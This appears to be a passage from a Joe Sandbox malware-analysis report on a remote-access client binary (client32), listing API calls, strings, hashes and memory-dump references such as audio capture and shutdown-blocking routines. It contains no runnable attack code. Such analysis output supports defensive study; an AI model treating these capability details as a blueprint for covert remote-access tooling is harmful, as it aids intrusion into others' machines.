                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084139269.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084497298.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084583311.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084622394.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: CountMessagePostSleepTick
                                                                                                                                                                                                    • String ID: AssertOnReboot$CLTCONN.CPP$Client$DisableLogoff$DisablePowerOff$DisableReboot$DisableShutDown$FALSE || !"assertOnReboot"$GPFOnReboot$_debug$sd - Post WM_CLOSE to %08x
                                                                                                                                                                                                    • API String ID: 507213284-4185502373
                                                                                                                                                                                                    • Opcode ID: edb7ba95a0dbe671a8f45536223d8c402f036747e014dfae0fdba634982649ab
                                                                                                                                                                                                    • Instruction ID: f79ec28786b2f4c10a59bc50768d7a54d57fb70274f002d705909bb0de105b61
                                                                                                                                                                                                    • Opcode Fuzzy Hash: edb7ba95a0dbe671a8f45536223d8c402f036747e014dfae0fdba634982649ab
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 12412934F4065EBEE721CA529C85FBDB795ABC0B0DF5040A5FE247E2C0EB60B4408355
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • InterlockedIncrement.KERNEL32(111E59C8), ref: 1111D2B9
                                                                                                                                                                                                    • GetDC.USER32(?), ref: 1111D3DD
                                                                                                                                                                                                    • GetDeviceCaps.GDI32(00000000,00000026), ref: 1111D3F2
                                                                                                                                                                                                    • CreateCompatibleDC.GDI32(?), ref: 1111D41B
                                                                                                                                                                                                    • CreateCompatibleDC.GDI32(?), ref: 1111D441
                                                                                                                                                                                                      • Part of subcall function 1110F690: GetStockObject.GDI32(0000000D), ref: 1110F6A9
                                                                                                                                                                                                      • Part of subcall function 1110F690: GetObjectA.GDI32(00000000,0000003C,?), ref: 1110F6B6
                                                                                                                                                                                                      • Part of subcall function 1110F690: AddFontResourceA.GDI32(SMALLE.FON), ref: 1110F6FC
                                                                                                                                                                                                      • Part of subcall function 1110F690: AddFontResourceA.GDI32(SYMBOLE.FON), ref: 1110F703
                                                                                                                                                                                                      • Part of subcall function 1110F690: AddFontResourceA.GDI32(SERIFE.FON), ref: 1110F70A
                                                                                                                                                                                                      • Part of subcall function 1110F690: AddFontResourceA.GDI32(SSERIFE.FON), ref: 1110F711
                                                                                                                                                                                                      • Part of subcall function 1110F690: AddFontResourceA.GDI32(COURE.FON), ref: 1110F718
                                                                                                                                                                                                      • Part of subcall function 1110F690: AddFontResourceA.GDI32(VGASYS.FON), ref: 1110F71F
                                                                                                                                                                                                      • Part of subcall function 1110F690: AddFontResourceA.GDI32(VGAFIX.FON), ref: 1110F726
                                                                                                                                                                                                      • Part of subcall function 1110F690: AddFontResourceA.GDI32(SMALLF.FON), ref: 1110F72D
                                                                                                                                                                                                      • Part of subcall function 1110F690: AddFontResourceA.GDI32(SYMBOLF.FON), ref: 1110F734
                                                                                                                                                                                                      • Part of subcall function 1110F690: AddFontResourceA.GDI32(SERIFF.FON), ref: 1110F73B
                                                                                                                                                                                                      • Part of subcall function 1110F690: AddFontResourceA.GDI32(SSERIFF.FON), ref: 1110F742
                                                                                                                                                                                                      • Part of subcall function 1110F690: AddFontResourceA.GDI32(COURF.FON), ref: 1110F749
                                                                                                                                                                                                      • Part of subcall function 1110F690: AddFontResourceA.GDI32(8514SYS.FON), ref: 1110F750
                                                                                                                                                                                                      • Part of subcall function 1110F690: AddFontResourceA.GDI32(8514FIX.FON), ref: 1110F757
                                                                                                                                                                                                      • Part of subcall function 1110F690: AddFontResourceA.GDI32(DOSAPP.FON), ref: 1110F75E
                                                                                                                                                                                                    • SetStretchBltMode.GDI32(?,00000001), ref: 1111D46F
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 0000000B.00000002.70084176258.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084139269.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084497298.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084583311.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084622394.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: FontResource$CompatibleCreateObject$CapsDeviceIncrementInterlockedModeStockStretch
                                                                                                                                                                                                    • String ID: ..\ctl32\Remote.cpp$Cachesize$ScaleToFitMode$View$idata->bmc.bmcache$idata->dcache [i]$idata->gcache$idata->gcache == NULL
                                                                                                                                                                                                    • API String ID: 2679142411-442042151
                                                                                                                                                                                                    • Opcode ID: e3b5b5c9a40ee4a0cbc48b1e016f5efcc9a74aa2538585c9951ba4c7deda69df
                                                                                                                                                                                                    • Instruction ID: 132018d3be7588c9e0a9856a97cff627b8037e08f3dc5478dbc2c9ccb036d385
                                                                                                                                                                                                    • Opcode Fuzzy Hash: e3b5b5c9a40ee4a0cbc48b1e016f5efcc9a74aa2538585c9951ba4c7deda69df
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 094104B5B41B026BD760DB71DC89FCAF2E4AF55708F004439F56A9A284F7B0B5408B56
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • wsprintfA.USER32 ref: 110416EC
                                                                                                                                                                                                    • wsprintfA.USER32 ref: 1104171E
                                                                                                                                                                                                    • wsprintfA.USER32 ref: 11041769
                                                                                                                                                                                                    • CreateProcessA.KERNEL32(00000000,?,00000000,00000000,00000000,04000000,00000000,00000000,?,?), ref: 110417AE
                                                                                                                                                                                                    • CloseHandle.KERNEL32(?), ref: 110417C5
                                                                                                                                                                                                    • CloseHandle.KERNEL32(?), ref: 110417CE
                                                                                                                                                                                                      • Part of subcall function 11094E70: LoadLibraryA.KERNEL32(USER32,?,?,110077D5), ref: 11094E79
                                                                                                                                                                                                      • Part of subcall function 11094E70: GetProcAddress.KERNEL32(00000000,GetMonitorInfoA), ref: 11094E8D
                                                                                                                                                                                                      • Part of subcall function 11094E70: GetProcAddress.KERNEL32(00000000,EnumDisplayMonitors), ref: 11094E9A
                                                                                                                                                                                                      • Part of subcall function 11094E70: GetProcAddress.KERNEL32(?,EnumDisplayDevicesA), ref: 11094EA7
                                                                                                                                                                                                      • Part of subcall function 11094E70: GetProcAddress.KERNEL32(?,MonitorFromRect), ref: 11094EB4
                                                                                                                                                                                                      • Part of subcall function 11094DC0: SystemParametersInfoA.USER32(00000030,00000000,?,00000000), ref: 11094DDD
                                                                                                                                                                                                      • Part of subcall function 1110C420: wsprintfA.USER32 ref: 1110C454
                                                                                                                                                                                                      • Part of subcall function 11015410: GlobalAddAtomA.KERNEL32(NSMIdentifyWnd), ref: 11015426
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 0000000B.00000002.70084176258.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084139269.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084497298.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084583311.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084622394.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: AddressProcwsprintf$CloseHandle$AtomCreateGlobalInfoLibraryLoadParametersProcessSystem
                                                                                                                                                                                                    • String ID: %s %s$%sPlaySound.exe$%sSounds\%s$D$RandomSelect$StudentPicked.wav$StudentSelected.wav
                                                                                                                                                                                                    • API String ID: 186240662-3892444432
                                                                                                                                                                                                    • Opcode ID: 626b57387dd91a73adf296395c911d9880e4fc6db4f814020c376c6a938eeb46
                                                                                                                                                                                                    • Instruction ID: 9c2d6cc32ef246ace46494575b6d7f0e632273de9197a299b6468622a4a2010b
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 626b57387dd91a73adf296395c911d9880e4fc6db4f814020c376c6a938eeb46
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 0A7187B5E4021E6BEB15DB50DC81FDEB7B8AB04718F1041D9E619A71C0EA70BB44CFA5
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • EnterCriticalSection.KERNEL32(?,Audio,DisableSounds,00000000,00000000,BBC4A55B), ref: 1100B3BB
                                                                                                                                                                                                    • CreateFileA.KERNEL32(\\.\NSAudioFilter,C0000000,00000000,00000000,00000003,40000000,00000000), ref: 1100B3D8
                                                                                                                                                                                                    • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000), ref: 1100B42F
                                                                                                                                                                                                    • LeaveCriticalSection.KERNEL32(?), ref: 1100B469
                                                                                                                                                                                                      • Part of subcall function 1100AC60: EnterCriticalSection.KERNEL32(?,BBC4A55B), ref: 1100ACA4
                                                                                                                                                                                                      • Part of subcall function 1100AC60: LoadLibraryA.KERNEL32(Kernel32.dll), ref: 1100ACC2
                                                                                                                                                                                                      • Part of subcall function 1100AC60: GetProcAddress.KERNEL32(?,CancelIo), ref: 1100AD0E
                                                                                                                                                                                                      • Part of subcall function 1100AC60: InterlockedExchange.KERNEL32(?,000000FF), ref: 1100AD55
                                                                                                                                                                                                      • Part of subcall function 1100AC60: CloseHandle.KERNEL32(00000000), ref: 1100AD5C
                                                                                                                                                                                                      • Part of subcall function 1100AC60: FreeLibrary.KERNEL32(?), ref: 1100AD8B
                                                                                                                                                                                                      • Part of subcall function 1100AC60: LeaveCriticalSection.KERNEL32(?), ref: 1100AD95
                                                                                                                                                                                                    • LeaveCriticalSection.KERNEL32(?), ref: 1100B48E
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    • Vista AddAudioCapEvtListener(%p), xrefs: 1100B513
                                                                                                                                                                                                    • DisableSounds, xrefs: 1100B362
                                                                                                                                                                                                    • Vista new pAudioCap=%p, xrefs: 1100B4F3
                                                                                                                                                                                                    • \\.\NSAudioFilter, xrefs: 1100B3D0
                                                                                                                                                                                                    • InitCaptureSounds NT6, xrefs: 1100B4AE
                                                                                                                                                                                                    • Audio, xrefs: 1100B367
                                                                                                                                                                                                    • Error. Vista AddAudioCaptureEventListener ret %s, xrefs: 1100B53C
                                                                                                                                                                                                    • Error. Vista AudioCapture GetInstance ret %s, xrefs: 1100B4E3
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 0000000B.00000002.70084176258.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084139269.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084497298.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084583311.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084622394.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: CriticalSection$Leave$CreateEnterLibrary$AddressCloseEventExchangeFileFreeHandleInterlockedLoadProc
                                                                                                                                                                                                    • String ID: Audio$DisableSounds$Error. Vista AudioCapture GetInstance ret %s$Error. Vista AddAudioCaptureEventListener ret %s$InitCaptureSounds NT6$Vista AddAudioCapEvtListener(%p)$Vista new pAudioCap=%p$\\.\NSAudioFilter
                                                                                                                                                                                                    • API String ID: 2063774063-2362500394
                                                                                                                                                                                                    • Opcode ID: 8c0021620979079e8b2f1001507a6bebe200837a90809a63ef1329eec99b15e0
                                                                                                                                                                                                    • Instruction ID: 13704de1d539ef30c3066c3cc5484e22fa9722ec6e344ec07ec17af159e95cc0
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 8c0021620979079e8b2f1001507a6bebe200837a90809a63ef1329eec99b15e0
                                                                                                                                                                                                    • Instruction Fuzzy Hash: A951D8B5E04A4AAFE714CF64DC80BAEF7E8FB04359F10467EE92993640E731765087A1
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • LoadLibraryExA.KERNEL32(PCIRES,00000000,00000000), ref: 110271C0
                                                                                                                                                                                                    • LoadIconA.USER32(00000000,00007D0B), ref: 110271D5
                                                                                                                                                                                                    • GetSystemMetrics.USER32(00000032), ref: 110271EE
                                                                                                                                                                                                    • GetSystemMetrics.USER32(00000031), ref: 110271F3
                                                                                                                                                                                                    • LoadImageA.USER32(00000000,00007D0B,00000001,00000000), ref: 11027203
                                                                                                                                                                                                    • LoadIconA.USER32(11000000,00000491), ref: 1102721B
                                                                                                                                                                                                    • GetSystemMetrics.USER32(00000032), ref: 1102722A
                                                                                                                                                                                                    • GetSystemMetrics.USER32(00000031), ref: 1102722F
                                                                                                                                                                                                    • LoadImageA.USER32(11000000,00000491,00000001,00000000), ref: 11027240
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 0000000B.00000002.70084176258.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084139269.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084497298.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084583311.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084622394.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: Load$MetricsSystem$IconImage$Library
                                                                                                                                                                                                    • String ID: AdminUserAcknowledge$PCIRES$_License$product
                                                                                                                                                                                                    • API String ID: 3832029118-1270847556
                                                                                                                                                                                                    • Opcode ID: b5081cdd9087fe896703f36cdb24c0bbd67552c611d9c1bb16947e5bd2980717
                                                                                                                                                                                                    • Instruction ID: 7d40fe3dfb7a436b35654b91f1e6e13152f39ea3f8258807fefd6660e2433123
                                                                                                                                                                                                    • Opcode Fuzzy Hash: b5081cdd9087fe896703f36cdb24c0bbd67552c611d9c1bb16947e5bd2980717
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 00513775F40B176BEB11CAA48C81F6FB6AD9F55708F504025FE05E7281EB70E904C7A2
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • LoadLibraryA.KERNEL32(ws2_32.dll), ref: 689D09A6
                                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,WSAStartup), ref: 689D09C3
                                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,WSACleanup), ref: 689D09CD
                                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,socket), ref: 689D09DB
                                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,closesocket), ref: 689D09E9
                                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,WSAIoctl), ref: 689D09F7
                                                                                                                                                                                                    • FreeLibrary.KERNEL32(00000000), ref: 689D0A6C
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 0000000B.00000002.70085335143.00000000689B1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 689B0000, based on PE: true
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70085295170.00000000689B0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70085417905.00000000689F0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70085459790.00000000689F9000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70085499162.00000000689FA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70085499162.00000000689FE000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70085581340.0000000068A00000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_689b0000_client32.jbxd
                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: AddressProc$Library$FreeLoad
                                                                                                                                                                                                    • String ID: WSACleanup$WSAIoctl$WSAStartup$closesocket$socket$ws2_32.dll
                                                                                                                                                                                                    • API String ID: 2449869053-2279908372
                                                                                                                                                                                                    • Opcode ID: f5b1db86d8d30a3c5533aee2abc3e974ea33af8802a4696f27d615dd0fd726c0
                                                                                                                                                                                                    • Instruction ID: 3303e6760095e447865f75d84a0a1a802eda909793a189a6bbffb0e1b225b3b7
                                                                                                                                                                                                    • Opcode Fuzzy Hash: f5b1db86d8d30a3c5533aee2abc3e974ea33af8802a4696f27d615dd0fd726c0
                                                                                                                                                                                                    • Instruction Fuzzy Hash: F531C771B01618AFEB189B748C59FEE77B8EF8A314F404195F909A7280DB749E41CF91
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    • F, xrefs: 11065959
                                                                                                                                                                                                    • ..\ctl32\Connect.cpp, xrefs: 110657F2, 110658C5, 11065AB0
                                                                                                                                                                                                    • nclen=%d, bytesleft=%d, cmd=%d (%x), nbytes_c=%d, nbytes_uc=%d, p=%x, p0=%x, xrefs: 1106594A
                                                                                                                                                                                                    • offset=%04x, nbytes=%04x (%d), nc=x%x, xrefs: 110659A8
                                                                                                                                                                                                    • datalen + idata->recvbytes <= MAX_DEFLATE_SIZE (MAX_STREAMLEN), xrefs: 110657F7
                                                                                                                                                                                                    • %02x , xrefs: 11065A48
                                                                                                                                                                                                    • Decompress error: %s, xrefs: 1106596D
                                                                                                                                                                                                    • DoStream error, been_reset=1, xrefs: 1106578A
                                                                                                                                                                                                    • %04x: %s, xrefs: 11065A70
                                                                                                                                                                                                    • Decomp, nbytes_c=%d, xrefs: 110658B1
                                                                                                                                                                                                    • Compression Error. (s%d) NSMConnection::DoStream **** not selected ****, xrefs: 11065762
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 0000000B.00000002.70084176258.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084139269.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084497298.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084583311.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084622394.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID:
